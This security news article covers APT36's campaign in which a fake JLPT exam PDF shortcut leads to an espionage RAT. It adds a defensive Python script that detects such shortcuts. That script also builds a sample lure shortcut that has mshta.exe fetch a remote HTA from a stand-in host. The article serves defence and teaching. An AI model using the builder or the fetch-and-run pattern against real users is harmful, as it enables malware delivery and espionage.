A seemingly harmless notification about a Japanese language proficiency exam has become the latest vector for state-aligned cyber espionage. A new investigation by CYFIRMA has uncovered a sophisticated malware campaign attributed to APT36 (also known as Transparent Tribe), a Pakistan-aligned threat actor known for targeting Indian governmental and strategic entities.
The campaign, tracked since December 2025, marks a dangerous evolution in the group’s tactics, moving away from simple phishing to complex, “fileless” attacks designed to evade detection by modern security software.
The attack begins with a classic lure: a ZIP archive titled “Online JLPT Exam Dec 2025.zip”. Inside sits what appears to be a PDF document.
According to the analysis, the file is actually a Windows Shortcut (LNK) file padded to over 2 MB so that its size matches that of a real document. Explorer never displays the .lnk extension, so a shortcut named like a PDF and carrying a PDF icon is indistinguishable from one at a glance; double-clicking it triggers the malicious chain.

“The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion,” the report states.
To maintain the illusion, the malware even opens a benign decoy PDF containing exam instructions while it silently infects the system in the background.
What makes this campaign particularly potent is its refusal to drop traditional malware files onto the hard drive immediately. Instead, it “lives off the land,” abusing trusted Windows tools to do its dirty work.
Upon execution, the LNK file calls upon mshta.exe, a legitimate Windows utility, to download and run a malicious script from a remote server.
“Execution of the LNK file leverages the trusted Windows binary mshta.exe to retrieve and execute attacker-controlled HTA content in a fileless manner,” CYFIRMA researchers explained.
This “fileless” approach lets the malware decrypt and assemble its payload entirely in memory, leaving few footprints for forensic teams to find. Fileless is relative, though: the ZIP, the LNK and the decoy PDF still land on disk, and the launch of mshta.exe with a URL as its argument is visible to process-creation logging, which is where defenders should look for this chain.
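The traits described above (a shortcut masquerading as a PDF, inflated to document size, whose target is mshta.exe pointed at a remote HTA) can be checked statically before anyone double-clicks. The following is an added triage script, not CYFIRMA's tooling or the actual sample: it parses the MS-SHLLINK header and string data of a .lnk file and flags each of those traits. The shortcut bytes it inspects are constructed inline with a placeholder URL (example.invalid) and assumed paths, and the 64 KB size threshold is an assumption, not a figure from the report.

```python
"""Static triage for the LNK-disguised-as-PDF lure (added example, constructed input)."""
import struct
import uuid

# On-disk layout of the ShellLink CLSID 00021401-0000-0000-C000-000000000046
LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
LNK_MAGIC = b"\x4c\x00\x00\x00"                # HeaderSize == 0x4C

# LinkFlags bits from MS-SHLLINK section 2.1.1
HAS_IDLIST, HAS_LINKINFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELPATH, HAS_WORKDIR, HAS_ARGS = 0x08, 0x10, 0x20
HAS_ICON, IS_UNICODE = 0x40, 0x80

SIZE_LIMIT = 64 * 1024   # assumption: genuine shortcuts are a few KB, never megabytes
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")


def parse_lnk(data):
    """Return the StringData fields of a shortcut, or None if data is not an LNK."""
    if len(data) < 76 or data[:4] != LNK_MAGIC or data[4:20] != LNK_CLSID:
        return None
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                    # end of the fixed ShellLinkHeader
    if flags & HAS_IDLIST:                      # skip LinkTargetIDList (2-byte size + list)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                    # skip LinkInfo (first dword is its size)
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    # StringData blocks appear in this fixed order, each as a char count + string
    for flag, name in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                       (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                       (HAS_ICON, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


def triage(filename, data):
    """List the lure traits found in one file; an empty list means nothing matched."""
    fields = parse_lnk(data)
    if fields is None:
        return []
    findings = []
    low = filename.lower()
    if low.endswith(".lnk") and any(ext in low[:-4] for ext in DOC_EXTS):
        findings.append("document extension in shortcut name")
    if len(data) > SIZE_LIMIT:
        findings.append(f"oversized shortcut ({len(data)} bytes)")
    cmd = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    if "mshta" in cmd:
        findings.append("launches mshta.exe")
    if "http://" in cmd or "https://" in cmd:
        findings.append("remote URL on the command line")
    if any(s in fields.get("icon_location", "").lower() for s in ("acrord32", "pdf")):
        findings.append("icon borrowed from a PDF reader")
    return findings


def build_sample_lnk(pad_to=2 * 1024 * 1024):
    """Construct a shortcut with the lure's shape for testing (not the real sample)."""
    flags = HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = (LNK_MAGIC + LNK_CLSID + struct.pack("<I", flags)
              + struct.pack("<I", 0)                # FileAttributes
              + b"\x00" * 24                        # Creation/Access/Write times
              + struct.pack("<III", 0, 0, 7)        # FileSize, IconIndex, ShowCommand=SW_SHOWMINNOACTIVE
              + struct.pack("<HHII", 0, 0, 0, 0))   # HotKey, Reserved1..3
    assert len(header) == 76

    def sd(text):                                   # one StringData block, UTF-16LE
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = (sd(r"..\..\..\Windows\System32\mshta.exe")                  # RELATIVE_PATH
            + sd("https://example.invalid/jlpt/stage1.hta")            # ARGUMENTS (placeholder URL)
            + sd(r"%ProgramFiles%\Adobe\Acrobat Reader\AcroRd32.exe")  # ICON_LOCATION (assumed)
            + struct.pack("<I", 0))                                     # TerminalBlock
    lnk = header + body
    # Windows ignores bytes after the TerminalBlock, so the file can be inflated
    # with an embedded PDF and still work as a shortcut.
    return lnk + b"%PDF-1.7\n" + b"\x00" * (pad_to - len(lnk) - 9)


if __name__ == "__main__":
    for finding in triage("Online JLPT Exam Dec 2025.pdf.lnk", build_sample_lnk()):
        print("-", finding)
```

Run against extracted archive contents at the mail gateway or during incident triage, the header check matters more than the file name: a shortcut renamed to "exam.pdf" still begins with the LNK magic and CLSID, and a shortcut whose command line contains mshta plus a URL has no legitimate reason to arrive in an exam notification.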
Perhaps the most alarming feature of this new strain is its awareness. The malware doesn’t just run blindly; it surveys the battlefield. It scans the infected computer for specific antivirus products—including Kaspersky, Quick Heal, Avast, and Bitdefender—and changes its behavior accordingly to stay hidden.
“The malware implements antivirus-aware persistence mechanisms and encrypted command and control communications, enabling long-term access… while minimizing forensic artifacts and detection”.
For instance, if it detects “Quick Heal,” it uses a specific batch file method to maintain persistence. If it finds “Kaspersky,” it shifts tactics to a different directory structure.
Once entrenched, the malware functions as a fully featured Remote Access Trojan (RAT), turning the victim’s computer into a spy post. It can capture screenshots, log keystrokes, and hunt for sensitive files like Office documents and PDFs.
“Collectively, these capabilities confirm the malware’s role as an espionage focused RAT supporting surveillance, data exfiltration, and remote system control”.
The malware even includes a “clipboard manipulation” module, potentially allowing attackers to steal credentials or hijack cryptocurrency transactions.
Security experts warn that this campaign represents a significant step up for APT36. By combining social engineering with adaptive, memory-based malware, the group is becoming a harder target to track.
“This operation demonstrates a notable evolution in APT36’s tradecraft, characterized by the sophisticated abuse of trusted Windows components, file format deception, and multi-stage, fileless execution techniques”.
Organizations in the target sectors are urged to treat any unsolicited “exam” notifications or unexpected PDF attachments with extreme caution. Beyond user awareness, shortcut files arriving inside archives should be stripped or quarantined at the mail gateway, and mshta.exe, which few business workflows need, can be blocked outright with AppLocker or Windows Defender Application Control, or at minimum alerted on whenever it is launched with a URL as an argument.